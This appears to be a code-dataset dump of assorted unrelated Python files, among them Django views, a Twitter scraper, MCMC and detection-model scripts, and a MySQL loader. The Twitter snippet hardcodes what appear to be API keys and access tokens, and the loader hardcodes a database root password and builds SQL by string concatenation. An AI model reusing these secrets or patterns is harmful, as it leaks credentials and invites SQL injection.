index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
9,200 | 54833c19d68bb7a1817639ef761367ce75a3a46f | import numpy as np
import sys
import os
import cv2
if __name__ == "__main__":
# print(sys.argv[1])
# img = cv2.imread(sys.argv[1], 0)
# cv2.imshow('img', img)
# cv2.waitKey(0)
img = np.array([[1, 2], [1, 3], [1, 4]])
print(img.tolist())
sys.stdout.flush()
|
9,201 | 2f6baf4de40224f5a3d00ded35e751184ab59d0d | import doseresponse as dr
import numpy as np
import scipy.stats as st
import numpy.random as npr
import argparse
import itertools as it
# get rid of for real version
import pandas as pd
import os
seed = 1
npr.seed(seed)
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--samples", type=int, help="number of Hill and pIC50 samples for use in AP model",default=500)
parser.add_argument("-a", "--all", action='store_true', help='construct posterior predictive CDFs for Hill and pIC50 for all drugs and channels', default=False)
parser.add_argument("--num-cores", type=int, help="number of cores to parallelise drug/channel combinations",default=1)
parser.add_argument("-np", "--no-plots", action='store_true', help="don't make any plots, just save posterior predictive samples", default=False)
parser.add_argument("-tu", "--top-up", action='store_true', help="to use with --all, run on all drugs who don't already have MCMC files", default=False)
parser.add_argument("-sy", "--synthetic", action='store_true', help="use synthetic data (only one drug/channel combination exists currently", default=False)
parser.add_argument("-Ne", "--num_expts", type=int, help="how many experiments to fit to", default=0)
parser.add_argument("--data-file", type=str, help="csv file from which to read in data, in same format as provided crumb_data.csv")
args = parser.parse_args()
dr.setup(args.data_file)
drugs_to_run, channels_to_run = dr.list_drug_channel_options(args.all)
def construct_posterior_predictive_cdfs(alphas,betas,mus,ss):
num_x_pts = 501
hill_min = 0.
hill_max = 4.
pic50_min = -2.
pic50_max = 12.
hill_x_range = np.linspace(hill_min,hill_max,num_x_pts)
pic50_x_range = np.linspace(pic50_min,pic50_max,num_x_pts)
num_iterations = len(alphas) # assuming burn already discarded
hill_pdf_sum = np.zeros(num_x_pts)
hill_cdf_sum = np.zeros(num_x_pts)
pic50_pdf_sum = np.zeros(num_x_pts)
pic50_cdf_sum = np.zeros(num_x_pts)
fisk = st.fisk.cdf
fisk_pdf = st.fisk.pdf
logistic = st.logistic.cdf
logistic_pdf = st.logistic.pdf
for i in xrange(num_iterations):
hill_cdf_sum += fisk(hill_x_range,c=betas[i],scale=alphas[i],loc=0)
hill_pdf_sum += fisk_pdf(hill_x_range,c=betas[i],scale=alphas[i],loc=0)
pic50_cdf_sum += logistic(pic50_x_range,mus[i],ss[i])
pic50_pdf_sum += logistic_pdf(pic50_x_range,mus[i],ss[i])
hill_cdf_sum /= num_iterations
pic50_cdf_sum /= num_iterations
hill_pdf_sum /= num_iterations
pic50_pdf_sum /= num_iterations
return hill_x_range, hill_cdf_sum, pic50_x_range, pic50_cdf_sum, hill_pdf_sum, pic50_pdf_sum
def run(drug_channel):
drug, channel = drug_channel
print "\n\n{} + {}\n\n".format(drug,channel)
num_expts, experiment_numbers, experiments = dr.load_crumb_data(drug,channel)
if (0 < args.num_expts < num_expts):
num_expts = args.num_expts
save_samples_for_APs = False
else:
print "Fitting to all experiments\n"
save_samples_for_APs = True
drug, channel, output_dir, chain_dir, figs_dir, chain_file = dr.hierarchical_output_dirs_and_chain_file(drug,channel,num_expts)
try:
mcmc = np.loadtxt(chain_file,usecols=range(4))
except IOError:
print "tried loading", chain_file
print "No MCMC file found for {} + {}\n".format(drug,channel)
return None
total_iterations = mcmc.shape[0]
burn = total_iterations/4
mcmc = mcmc[burn:,:]
hill_x_range, hill_cdf_sum, pic50_x_range, pic50_cdf_sum, hill_pdf_sum, pic50_pdf_sum = construct_posterior_predictive_cdfs(mcmc[:,0],mcmc[:,1],mcmc[:,2],mcmc[:,3])
if (not args.no_plots):
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
labels = ["Hill","pIC50"]
fig = plt.figure(figsize=(8,4))
ax1 = fig.add_subplot(121)
ax1.plot(hill_x_range,hill_cdf_sum)
ax1.set_xlim(hill_x_range[0],hill_x_range[-1])
ax1.set_ylim(0,1)
ax1.set_xlabel("Hill")
ax1.set_ylabel("Cumulative distribution")
ax1.grid()
ax2 = fig.add_subplot(122,sharey=ax1)
ax2.plot(pic50_x_range,pic50_cdf_sum)
ax2.set_xlim(pic50_x_range[0],pic50_x_range[-1])
ax2.set_xlabel("pIC50")
ax2.grid()
plt.setp(ax2.get_yticklabels(), visible=False)
fig.tight_layout()
fig.savefig(figs_dir+"{}_{}_posterior_predictive_cdfs.png".format(drug,channel))
plt.close()
xs = [hill_x_range,pic50_x_range]
ys = [hill_pdf_sum,pic50_pdf_sum]
labels = ['$Hill$','$pIC50$']
file_labels = ['hill','pic50']
for i in xrange(2):
fig = plt.figure(figsize=(5,4))
ax = fig.add_subplot(111)
ax.plot(xs[i],ys[i],color='blue')
ax.grid()
ax.set_xlabel(labels[i])
ax.set_ylabel('Probability density')
ax.set_title('{} posterior predictive'.format(labels[i][1:-1]))
fig.tight_layout()
fig.savefig(figs_dir+"{}_{}_{}_posterior_predictive.png".format(drug,channel,file_labels[i]))
plt.close()
hill_cdf_file, pic50_cdf_file = dr.hierarchical_posterior_predictive_cdf_files(drug,channel,num_expts)
np.savetxt(hill_cdf_file,np.vstack((hill_x_range, hill_cdf_sum)).T)
np.savetxt(pic50_cdf_file,np.vstack((pic50_x_range, pic50_cdf_sum)).T)
hill_uniform_samples = npr.rand(args.samples)
pic50_uniform_samples = npr.rand(args.samples)
hill_interpolated_inverse_cdf_samples = np.interp(hill_uniform_samples,hill_cdf_sum,hill_x_range)
pic50_interpolated_inverse_cdf_samples = np.interp(pic50_uniform_samples,pic50_cdf_sum,pic50_x_range)
# save a number of MCMC samples for use in AP models
# we currently have it set to 500
# in theory, the more samples, the better the AP histograms will look!
if save_samples_for_APs:
samples_file = dr.hierarchical_hill_and_pic50_samples_for_AP_file(drug,channel)
with open(samples_file,'w') as outfile:
outfile.write('# {} samples of (Hill,pIC50) drawn from their posterior predictive distributions, as defined by MCMC samples\n'.format(args.samples))
np.savetxt(outfile,np.vstack((hill_interpolated_inverse_cdf_samples,pic50_interpolated_inverse_cdf_samples)).T)
print "\n{} + {} done!\n".format(drug,channel)
return None
drugs_channels = it.product(drugs_to_run,channels_to_run)
if (args.num_cores<=1) or (len(drugs_to_run)==1):
for drug_channel in drugs_channels:
#run(drug_channel)
# try/except is good when running multiple MCMCs and leaving them overnight,say
# if one or more crash then the others will survive!
# however, if you need more "control", comment out the try/except, and uncomment the other run(drug_channel) line
try:
run(drug_channel)
except Exception,e:
print e
print "Failed to run {} + {}!".format(drug_channel[0],drug_channel[1])
# run multiple MCMCs in parallel
elif (args.num_cores>1):
import multiprocessing as mp
num_cores = min(args.num_cores, mp.cpu_count()-1)
pool = mp.Pool(processes=num_cores)
pool.map_async(run,drugs_channels).get(9999999)
pool.close()
pool.join()
|
9,202 | 0c8b58acf33bdfa95984d29a75ae01e49d0da149 | from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Group(models.Model):
name = models.CharField(max_length=200, db_index=True)
loan_eligibility = models.CharField(max_length=200, db_index=True)
account_number = models.CharField(max_length=200, db_index=True)
incharge = models.CharField(max_length=200, db_index=True)
incharge2 = models.CharField(max_length=200, db_index=True)
class Member(models.Model):
name = models.CharField(max_length=200, db_index=True)
age = models.CharField(max_length=200)
phone = models.CharField(max_length=200)
address1 = models.CharField(max_length=200)
address2 = models.CharField(max_length=200)
phone = models.CharField(max_length=200)
|
9,203 | 6339f5c980ab0c0fb778870196493ddd83963ae7 | from dateutil import parser
from datetime import datetime
from backend.crawler import calender_crawler
from backend.logic.schedule_by_time.schedule_utils import get_weeks_of_subject
from backend.logic.schedule_by_time.schedule_utils import get_time_str
# e.g. hôm nay, hôm qua, ngày mai, thứ 2, thứ tư, chủ nhật, thứ năm tuần trước, thứ bảy tuần này, 04-06-2020, 10/06/2020 ....
def filter_by_weekday(schedule_table, time_entity):
time_str = get_time_str(time_entity)
time = parser.parse(time_str)
weekday = time.weekday() + 2
schedule = []
for row in schedule_table:
weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].strip())
weeks_of_subject = get_weeks_of_subject(row)
week_now = int(calender_crawler.crawl_callender()[1])
if (weekday_of_subject == weekday) and (week_now in weeks_of_subject):
schedule.append(row)
return schedule
# e.g. sáng mai, tối hôm qua, chiều hôm nay, sáng thứ 4 tuần này, chiều thứ 5 tuần sau, ....
def filter_by_session(schedule_table, time_entity):
subjects_of_day = filter_by_weekday(schedule_table, time_entity)
start_session_hour = parser.parse(time_entity['value']['from']).hour
schedule = []
for subject in subjects_of_day:
subject_start_time = int(subject['time'].split(',')[1].split('-')[0].split('h')[0].strip())
if (start_session_hour == 4) and (subject_start_time >= 12): # morning
continue
if (start_session_hour == 12) and (subject_start_time < 12): # afternoon
continue
if(start_session_hour == 18) and (subject_start_time < 18): # evening
continue
schedule.append(subject)
return schedule
# e.g. 9 giờ sáng mai, 7 giờ tối hôm qua, 4 giờ chiều thứ 2, ....
def filter_by_hour(schedule_table, time_entity):
subjects_of_day = filter_by_weekday(schedule_table, time_entity)
schedule = []
hour = parser.parse(get_time_str(time_entity)).hour
for subject in subjects_of_day:
subject_start_hour = int(subject['time'].split(',')[1].split('-')[0].split('h')[0].strip())
subject_end_hour = int(subject['time'].split(',')[1].split('-')[1].split('h')[0].strip())
if subject_start_hour <= hour <= subject_end_hour:
schedule.append(subject)
return schedule
# e.g. tuần sau, tuần trước, tuần này, ....
def filter_by_week(schedule_table, time_entity):
schedule = []
for row in schedule_table:
weeks_of_subject = get_weeks_of_subject(row)
week_now = int(calender_crawler.crawl_callender()[1])
if week_now in weeks_of_subject:
schedule.append(row)
return schedule
# e.g. tháng 3, tháng sau, tháng trước ....
def filter_by_month(schedule_table, time_entity):
return schedule_table
def filter_by_year(schedule_table, time_entity):
return schedule_table
def filter_by_multi_week(schedule_table, time_entity):
return schedule_table
def filter_by_multi_month(schedule_table, time_entity):
return schedule_table
def check_out_of_semester(time_entity):
time_str = get_time_str(time_entity)
date_str = time_str.split('T')[0]
date_ask = datetime.strptime(date_str, '%Y-%m-%d')
today = datetime.now()
diff_days = (date_ask - today).days
diff_weeks = diff_days // 7
semester_now = calender_crawler.crawl_callender()[0]
week_now = int(calender_crawler.crawl_callender()[1])
week_asked = week_now + diff_weeks
if (semester_now[4] == '1') and (week_asked > 25 or week_asked < 0): # 20191, 20201, 20211....
return True
if (semester_now[4] == '2') and (week_asked <= 25 or week_asked > 50):
return True
return False
|
9,204 | 1e81e0f3cb2fb25fdef08a913aa1ff77d0c2a562 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from machina.apps.forum_conversation.abstract_models import AbstractPost
from machina.apps.forum_conversation.abstract_models import AbstractTopic
from machina.core.db.models import model_factory
from django.dispatch import receiver
from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _
Topic = model_factory(AbstractTopic)
class UserNotification(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
notification_content = models.CharField(max_length=100)
notification_link = models.CharField(max_length=100)
created_at = models.DateTimeField(auto_now_add=True)
class Post(AbstractPost):
__original_flags = None
__original_votes = None
def __init__(self, *args, **kwargs):
super(Post, self).__init__(*args, **kwargs)
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
def save(self, force_insert=False, force_update=False, *args, **kwargs):
super(Post, self).save(force_insert, force_update, *args, **kwargs)
notification_link = "/forum/{}-{}/topic/{}-{}/?post={}#{}".format(self.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.topic.id, self.id, self.id)
if self.__original_flags != self.flag_count:
n = UserNotification(user=self.poster, notification_content="Flag updates on post {}".format(self.subject), notification_link=notification_link)
n.save()
if self.__original_votes != self.vote_count:
n = UserNotification(user=self.poster, notification_content="Vote update on post {}".format(self.subject), notification_link=notification_link)
n.save()
self.__original_flags = self.flag_count
self.__original_votes = self.vote_count
class Userflags(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
flag_count = models.PositiveIntegerField(
verbose_name=_('Flag count'), editable=False, blank=True, default=0)
@receiver(post_save, sender=User)
def create_userflags(sender, instance, created, **kwargs):
if created:
Userflags.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_userflags(sender, instance, **kwargs):
instance.userflags.save()
@receiver(post_save, sender=Post)
def make_notifications(sender, instance, created, **kwargs):
user = instance.topic.poster
notification_content = "You have a new notification"
notification_link = "/forum/{}-{}/topic/{}-{}/?post={}#{}".format(instance.topic.forum.slug, instance.topic.forum.id, instance.topic.slug, instance.topic.id, instance.id, instance.id)
if created:
notification_content = "A new post was created on your topic {}".format(instance.topic.slug)
else:
notification_content = "A post's contetn was edited on your topic {}".format(instance.topic.slug)
n = UserNotification(user=user, notification_link=notification_link, notification_content=notification_content)
n.save()
|
9,205 | afa20d7e9c7843a03090c00cc888d44a77fc29f3 | import urlparse
import twitter
import oauth2 as oauth
import re
import urllib
url_checker = dict()
def twitter_auth():
consumer_key = 'IqsuEo5xfTdWwjD1GZNSA'
consumer_secret = 'dtYmqEekw53kia3MJhvDagdByWGxuTiqJfcdGkXw8A'
request_token_url = 'https://api.twitter.com/oauth/request_token'
access_token_url = 'http://api.twitter.com/oauth/access_token'
authorize_url = 'http://api.twitter.com/oauth/authorize'
#consumer = oauth.Consumer(consumer_key, consumer_secret)
#client = oauth.Client(consumer)
#resp, content = client.request(request_token_url, "GET")
#request_token = dict(urlparse.parse_qsl(content))
#access_token_key = request_token['oauth_token']
#access_token_secret = request_token['oauth_token_secret']
api = twitter.Api(consumer_key,consumer_secret,'36001624-5JrcK4i6UO69IFY6vxZdRYxKBqjB42mwjhoSzzSP6','jgKWIncNLnzBvvhFeVTE0lkMGi1PH222YCEHSZHY')
return api
def twitter_pull(api,word):
results = api.GetSearch(word,None,None,100)
tweets = list()
for result in results:
tweets.append(result)
return tweets
def twitter_extract_urls(api,tweets):
pattern=re.compile('([a-zA-Z0-9\-\.]+\.[a-zA-Z]{2,3}/*\S*)?$')
urls=list()
for tweet in tweets:
found_urls = pattern.findall(tweet.text)
found_urls = map(lambda x: x.strip("?.()[]{}!@#$^&*;'.,"), found_urls)
urls.append(found_urls)
urls = filter(lambda x: x,urls)
return urls
def url_follow(url):
if url_checker.has_key(url):
return url_checker.get(url)
try:
r1 = urllib.urlopen('http://'+url)
url_checker.update({url:r1.geturl()})
return r1.geturl()
except:
pass
def unique_urls(urls):
new_urls=list()
for url in urls:
new_urls.append(url_follow(url[0]))
new_urls=filter(None,new_urls)
url_dictionary = [{ "url": url, "count": new_urls.count(url)} for url in set(new_urls)]
return url_dictionary
def compile_twitter_content(tweets,url_data):
content = list()
for x in range(0,2):
tweet = tweets[x]
content.append({'type':'tweet','data':tweet,'score':3})
for url in url_data:
content.append({'type':'url','data':url['url'],'score':url['count']})
return content
def twitter_similar_terms(tweets):
stop_words=["a","i","it","am","at","on","in","of","to","is","so","too","my","the","and","but","are","very","here","even","from","them","then","than","this","that","though"]
whole_text=''
for tweet in tweets:
whole_text += (tweet.text)
whole_text = whole_text.split()
whole_text_list=list()
for word in whole_text:
if not word in stop_words:
whole_text_list.append(word)
whole_text_dictionary = [{"word": word, "count": whole_text_list.count(word)} for word in set(whole_text_list)]
def get_twitter_content(term):
api = twitter_auth()
tweets = twitter_pull(api, term)
urls = twitter_extract_urls(api,tweets)
url_data = unique_urls(urls)
twitter_similar_terms(tweets)
return compile_twitter_content(tweets,url_data)
|
9,206 | 83ecb6b6237d7ee61f762b191ebc891521067a41 | from collections import OrderedDict
import torch
from torch import nn, Tensor
import warnings
from typing import Tuple, List, Dict, Optional, Union
class GeneralizedRCNN(nn.Module):
def __init__(self, backbone, rpn, roi_heads, transform):
super(GeneralizedRCNN, self).__init__()
self.transform = transform
self.backbone = backbone
self.rpn = rpn
self.roi_heads = roi_heads
def forward(self, images, targets=None):
if self.training and targets is None:
raise ValueError("In training model, targets should be passed")
if self.training:
assert targets is not None
# GT box shape,dtype check
for target in targets:
boxes = target["boxes"]
if isinstance(boxes, torch.Tensor):
if len(boxes.shape) != 2 or boxes.shape[-1] != 4:
raise ValueError(f"Expected target bxes to be a tensor"
f"of shape [N, 4], got {boxes.shape}.")
else:
raise ValueError(f"Expected target boxes to be of type"
f"Tensor, got {type(boxes)}.")
# add original image sizes
original_image_sizes : List[Tuple[int, int]] = []
for img in images:
val = img.shape[-2:] # (height, width)
assert len(val) == 2
original_image_sizes.append((val[0], val[1]))
images, targets = self.transform(images, targets)
# Check for degenerate boxes
if targets is not None:
for target_idx, target in enumerate(targets):
boxes = target["boxes"]
# degenerate boxes are boxes with x2y2 valeus smaller than x1y1
degenerate_boxes = boxes[:, 2:] <= boxes[:, :2]
if degenerate_boxes.any():
# print the first degenerate box
bb_idx = torch.where(degenerate_boxes.any(dim=1))[0][0]
degen_bb: List[float] = boxes[bb_idx].tolist()
raise ValueError(f"All bounding boxes should have positive height and width."
f" Found invalid box {degen_bb} for target at index {target_idx}")
features = self.backbone(images.tensors)
if isinstance(features, torch.Tensor):
features = OrderedDict(['0', features])
proposals, proposal_losses = self.rpn(images, features, targets)
detections, detector_losses = self.roi_heads(features, proposals, images.image_sizes, targets)
detections = self.transform.postprocess(detections, images.image_sizes, original_image_sizes)
losses = {}
losses.update(detector_losses)
losses.update(proposal_losses)
return losses, detections
|
9,207 | 2766339632200c26a8c6cd3abff28b1495870b9a | car_state = False
u_input = input(f'>')
if car_state == True:
print('Car is stopped!')
if u_input == 'start':
car_state = True
print('Car has started!')
elif u_input == 'stop':
car_state == False
print('Car has stopped!')
else:
print('''I don''t understand that...''') |
9,208 | d2c5d306591216e100b5bd8e8822b24fd137d092 | from django.shortcuts import render
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, HttpResponse
from .models import Document, Organization, UserProfile, Shop
#from .forms import DocUploadForm, ShopEditForm
from django.shortcuts import render_to_response, get_object_or_404
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login
from django.shortcuts import get_object_or_404
from django.contrib.auth.decorators import login_required
from django.forms import ModelForm
from django.utils.translation import ugettext_lazy as _
from django import forms
from .models import *
class DocUploadForm(forms.ModelForm):
tags = forms.ModelMultipleChoiceField(queryset=Tag.objects.all())
class Meta:
model = Document
# widgets = {'tags' : autocomplete_light.MultipleChoiceWidget('TagAutocomplete')}
# autocomplete_fields = ('tags','topic','university',)
exclude = ['organization','private_user','is_public','is_user_private','display']
class ShopForm(forms.Form):
shopName = forms.CharField(max_length=100)
email = forms.EmailField(widget=forms.TextInput(attrs={'class': 'mandatory', 'placeholder': 'Email'}),
label=_(u'email address'), required=False)
address = forms.CharField(widget= forms.Textarea())
pincode = forms.IntegerField()
nearest_college = forms.CharField(max_length=200, required=False)
nearest_town = forms.CharField(max_length=200, required=False)
telephone = forms.CharField(max_length=14)
longitude = forms.DecimalField(max_digits=11, decimal_places=7)
latitude = forms.DecimalField(max_digits=11, decimal_places=7)
username = forms.CharField(widget=forms.TextInput(attrs={'class': 'mandatory', 'placeholder': 'User Name'}),
label=_(u'Username'))
password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'mandatory', 'placeholder': 'Password'}, render_value=False),
label=_(u'Password'))
password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'mandatory', 'placeholder': ' Password Again'}, render_value=False),
label=_(u'Password Again'))
services = forms.ModelMultipleChoiceField(queryset=Service.objects.all())
def clean(self):
"""
Verifiy that the values entered into the two password fields
match. Note that an error here will end up in
``non_field_errors()`` because it doesn't apply to a single
field.
"""
if 'password1' in self.cleaned_data and 'password' in self.cleaned_data:
if self.cleaned_data['password1'] != self.cleaned_data['password']:
raise forms.ValidationError(_(u'You must type the same password each time'))
return self.cleaned_data
# def clean_email(self):
# if 'email' in self.cleaned_data:
# try:
# user = User.objects.get(username= self.cleaned_data["username"])
# raise forms.ValidationError(_(u'Already this Username is Registered'))
# except User.DoesNotExist:
# pass
# return self.cleaned_data["email"]
class ShopEditForm(forms.ModelForm):
class Meta:
model = Shop
exclude = ['latitude','longitude','is_active']
@login_required
def indexEmp(request):
context = {'shop':shopid}
return render(request,'index.html',context)
@login_required
def docUpload(request):
user = UserProfile.objects.get(user=request.user)
if(request.method=='POST'):
# import ipdb; ipdb.set_trace();
if(user.userType == 1 ):
org = Organization.objects.get(owner = request.user)
elif(user.userType == 2):
org = Organization.objects.get(employee = request.user)
data = DocUploadForm(request.POST,request.FILES)
new_doc = data.save(commit=False)
new_doc.organization = org
new_doc.is_public = True
new_doc.save()
data.save_m2m()
if(user.userType == 1 ):
return HttpResponseRedirect(reverse('documentListOwner'))
elif(user.userType == 2):
return HttpResponseRedirect(reverse('documentListEmp'))
else:
form = DocUploadForm()
if(user.userType == 1 ):
context = { "docUploadForm" : form}
return render(request,'printo_app/docUpload-owner.html',context)
if(user.userType == 2 ):
shopRate = Shop.objects.get(employee=request.user).rate
context = { "docUploadForm" : form,"rate":shopRate }
return render(request,'printo_app/docUpload-emp.html',context)
@login_required
def docList(request):
user = UserProfile.objects.get(user=request.user)
if(user.userType == 1 ):
org = Organization.objects.get(owner = request.user)
docList = Document.objects.filter(is_public=True).filter(organization=org)
context = {"docs":docList}
return render(request,'printo_app/docList-owner.html',context)
elif(user.userType == 2):
org = Organization.objects.get(employee = request.user)
docList = Document.objects.filter(is_public=True).filter(organization=org).order_by('-uploadedDate')
context = {"docs":docList}
return render(request,'printo_app/docList-emp.html',context)
@login_required
def docListOwner(request):
user = UserProfile.objects.get(user=request.user)
if(user.userType == 1 ):
org = Organization.objects.get(owner = request.user)
docList = Document.objects.filter(is_public=True).filter(organization=org)
context = {"docs":docList}
return render(request,'printo_app/docList-owner.html',context)
@login_required
def docDetail(request,docid):
docDetail = Document.objects.get(id=docid)
form = DocUploadForm(instance = docDetail)
context = {"docEditForm":form,"doc":docDetail}
return render(request,'printo_app/docDetail.html',context)
@login_required
def docEditSave(request,docid):
currentDoc = Document.objects.get(id=docid)
docDetail = DocUploadForm(request.POST,request.FILES,instance=currentDoc)
docDetail.save()
context = { "msg":docDetail }
return HttpResponseRedirect(reverse('documentList'))
@login_required
def shopProfile(request,shopid=None):
context = {}
user = UserProfile.objects.get(user=request.user)
if(user.userType == 1):
pass
elif(user.userType == 2):
shop = Shop.objects.get(employee=request.user)
shopForm = ShopEditForm()
context = {'shopForm':shopForm,'details':shop}
return render(request,'printo_app/shopProfile.html',context)
@login_required
def shopEditSave(request):
shop = Shop.objects.get(employee=request.user)
shopForm = ShopEditForm(request.POST,instance=shop)
shopForm.save()
return HttpResponseRedirect(reverse('shopProfile'))
@login_required
def indexEmp(request,shopid=None):
user = UserProfile.objects.get(user=request.user)
is_owner = False
if(user.userType == 1):
is_owner = True
elif(user.userType == 2):
is_owner = False
context = {'is_owner':is_owner}
return HttpResponseRedirect(reverse('orderList'))
@login_required
def orderList(request,shopid=None):
shop = Shop.objects.get(employee = request.user)
orderList = Order.objects.filter(shop=shop)
new_count = orderList.filter(is_new=True).count()
pending_count = orderList.filter(is_accepted=True).count()
completed_count = orderList.filter(is_printed=True).count()
delivered_count = orderList.filter(is_delivered=True).count()
context = {"orders":orderList,"new_count":new_count,"pending_count":pending_count,"completed_count":completed_count,"delivered_count":delivered_count}
return render(request,'printo_app/ordersList.html',context)
@login_required
def shopList(request):
org = Organization.objects.get(owner = request.user)
shops = Shop.objects.filter(owner = org )
context={'shops' : shops}
return render(request,'printo_app/shopList.html',context)
@login_required
def shopCreate(request):
uprofile =get_object_or_404(UserProfile, user=request.user)
if uprofile.userType==1:
pass
else:
return HttpResponse("You don't have permission")
if(request.method=='POST'):
form = ShopForm(request.POST)
import ipdb; ipdb.set_trace()
if(form.is_valid()):
username = form.cleaned_data.get("username", None)
password = form.cleaned_data.get("password", None)
telephone = form.cleaned_data.get("telephone", None)
email = request.user.email
# email = form.cleaned_data.get("email", None)
# if email == None:
# email = request.user.email
if username != None:
user = User.objects.create_user(username=username,email=email, password=password)
userprofile = UserProfile()
userprofile.user = user
userprofile.userType = 2
if telephone !=None:
userprofile.telephone = telephone
userprofile.save()
# shop = Shop()
shopprofile = Shop()
shopprofile.employee = user
shopprofile.owner = Organization.objects.get(owner = request.user)
shopprofile.email = email
shopprofile.shopName = form.cleaned_data.get("shopName", None)
shopprofile.pincode = form.cleaned_data.get("pincode",None)
shopprofile.address = form.cleaned_data.get("address",None)
shopprofile.latitude = form.cleaned_data.get("latitude",None)
shopprofile.longitude = form.cleaned_data.get("longitude",None)
shopprofile.telephone = form.cleaned_data.get("telephone",None)
shopprofile.save()
shopprofile.services = form.cleaned_data.get("services",None)
# shop.save_m2m()
return HttpResponseRedirect(reverse('shopList'))
else:
userform = 'this form is to be deleted'
shopform = ShopForm()
context = { 'shopCreateForm' : shopform, 'userForm' : userform }
return render(request,'printo_app/shopCreate.html',context)
@login_required
def index(request):
user = UserProfile.objects.get(user=request.user)
if(user.userType == 1):
return HttpResponseRedirect(reverse('OwnerMain'))
elif(user.userType == 2):
return HttpResponseRedirect(reverse('EmployeeMain'))
return None
class RegistrationForm(forms.Form):
email = forms.EmailField(widget=forms.TextInput(attrs={'class': 'mandatory', 'placeholder': 'Email'}),
label=_(u'email address'))
password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'mandatory', 'placeholder': 'Password'}, render_value=False),
label=_(u'Password'))
password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'mandatory', 'placeholder': ' Password Again'}, render_value=False),
label=_(u'Password Again'))
mobile = forms.CharField(max_length=14)
def clean(self):
"""
Verifiy that the values entered into the two password fields
match. Note that an error here will end up in
``non_field_errors()`` because it doesn't apply to a single
field.
"""
if 'password1' in self.cleaned_data and 'password' in self.cleaned_data:
if self.cleaned_data['password1'] != self.cleaned_data['password']:
raise forms.ValidationError(_(u'You must type the same password each time'))
return self.cleaned_data
def clean_email(self):
if 'email' in self.cleaned_data:
try:
user = User.objects.get(username= self.cleaned_data["email"])
raise forms.ValidationError(_(u'Already Email Address is registered'))
except User.DoesNotExist:
pass
return self.cleaned_data["email"]
def index_main(request):
if request.user.is_authenticated()==True:
return HttpResponseRedirect(reverse("main"))
else:
if request.method=="POST":
form= RegistrationForm(request.POST)
if form.is_valid():
u = User.objects.create_user(form.cleaned_data["email"], form.cleaned_data["email"], form.cleaned_data["password"],)
# Send a mail with verification code
profile = UserProfile()
profile.user =u
profile.userType =1
profile.mobile = form.cleaned_data["mobile"]
profile.save()
org= Organization()
org.owner = u
org.save()
return HttpResponse("Thanks")
else:
form =RegistrationForm()
return render( request, 'index_main.html', context={"form":form},)
def docListOwner(request):
pass
def docUploadOwner(request):
pass
@login_required
def indexOwner(request):
context = {}
return render(request,'ownerMain.html',context)
# ====================================
# DATA PROVIDERS
# ====================================
import json
from django.core import serializers
def get_universitys(request):
p={}
# import ipdb; ipdb.set_trace()
for c in University.objects.all():
p[c.name] = (c.name,c.pk)
return HttpResponse(json.dumps(p), content_type="application/json")
def get_publishers(request):
p={}
# import ipdb; ipdb.set_tra ce()
for c in Publisher.objects.all():
p[c.name] = (c.name,c.pk)
return HttpResponse(json.dumps(p), content_type="application/json")
def get_courses(request):
p={}
# import ipdb; ipdb.set_tra ce()
for c in Course.objects.all():
p[c.name] = (c.name,c.pk)
return HttpResponse(json.dumps(p), content_type="application/json")
def get_topics(request):
p={}
# import ipdb; ipdb.set_tra ce()
for c in Topic.objects.all():
p[c.name] = (c.name,c.pk)
return HttpResponse(json.dumps(p), content_type="application/json")
def get_tags(request):
p={}
# import ipdb; ipdb.set_tra ce()
for c in Tag.objects.all():
p[c.name] = (c.name,c.id)
return HttpResponse(json.dumps(p), content_type="application/json")
def get_services(request):
p={}
# import ipdb; ipdb.set_trace()
for c in Service.objects.all():
p[c.name] = (c.name,c.id)
return HttpResponse(json.dumps(p), content_type="application/json")
def get_colleges(request):
p={}
for c in College.objects.all():
p[c.name] =(str(c.latitude), str(c.longitude))
return HttpResponse(json.dumps(p), content_type="application/json")
def get_cities(request):
p={}
for c in City.objects.all():
p[c.name] =(str(c.latitude), str(c.longitude))
return HttpResponse(json.dumps(p), content_type="application/json")
|
9,209 | 7171edc3eecd2f0cdebd914e89a7a7e0353ddf63 | '''code for recursuve binary search '''
def rbinarysearch(l, k, begin, end):
if(begin == end):
if(l[begin] == k):
return 1
else:
return 0
if(end-begin == 1):
if(l[end] == k) or (l[begin] == k):
return 1
else:
return 0
if(end-begin > 1):
mid = (end+begin)//2
if(l[mid] > k):
end = mid-1
if(l[mid] < k):
begin = mid+1
if(l[mid] == k):
return 1
if(end-begin < 0):
return 0
return rbinarysearch(l, k, begin, end)
print(rbinarysearch([1,2,3,4,5], -1, 0,4))
|
9,210 | 291052c22059b32f3f300c323a10b260fbd0c20f | import mysql.connector
import json
mysql_user = 'root'
mysql_pass = 'funwfats'
mysql_host = 'localhost'
mysql_base = 'sys'
wn8_file = "wn8exp.json"
def fill_wn8_table():
with open(wn8_file, encoding="utf-8") as file:
wn8_dict = json.loads(file.read())
cnx_wn8 = mysql.connector.connect(user=mysql_user, password=mysql_pass, host=mysql_host, database=mysql_base)
cursor_wn8 = cnx_wn8.cursor()
for tank in wn8_dict['data']:
add = "INSERT into wn8exp (id) VALUES (" + str(tank['IDNum']) + ");"
tid = tank['IDNum']
cursor_wn8.execute(add)
for stat in tank:
if stat != 'IDNum':
update = "UPDATE wn8exp SET " + stat + " = " + "\'" + str(tank[stat]) \
+ "\'" + " WHERE id = " + str(tid) + ";"
cursor_wn8.execute(update)
# for tank in wn8_dict['data']:
# for stat in tank:
# if stat == "IDNum":
# add = "INSERT into wn8exp (id) VALUES (" + str(tank[stat]) + ");"
# tid = tank[stat]
# cursor_wn8.execute(add)
# else:
